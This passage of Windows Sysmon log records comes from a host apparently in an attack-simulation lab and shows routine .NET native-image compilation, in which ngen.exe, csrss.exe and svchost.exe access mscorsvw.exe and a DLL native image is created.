{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.982\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1370-5F25-0000-0010A1C50E00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.982","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1370-5F25-0000-0010A1C50E00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.982\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1370-5F25-0000-0010A1C50E00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.982","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1370-5F25-0000-0010A1C50E00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.982\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1370-5F25-0000-0010A1C50E00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.982","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1370-5F25-0000-0010A1C50E00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8374,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.044\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-134C-5F25-0000-001003F10D00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.044","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-134C-5F25-0000-001003F10D00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.044\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-134C-5F25-0000-001003F10D00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.044","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-134C-5F25-0000-001003F10D00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.060\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-001004C90E00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.060","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-001004C90E00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:09.623\r\nProcessGuid: {E2A3D6B1-1371-5F25-0000-001004C90E00}\r\nProcessId: 1292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\50c-0\\System.DirectoryServices.AccountManagement.dll\r\nCreationUtcTime: 2020-08-01 07:02:09.623","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:09.623","ProcessGuid":"{E2A3D6B1-1371-5F25-0000-001004C90E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\50c-0\\System.DirectoryServices.AccountManagement.dll","CreationUtcTime":"2020-08-01 07:02:09.623","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.669\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-0010E6CF0E00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.669","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-0010E6CF0E00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8379,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-0010E6CF0E00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 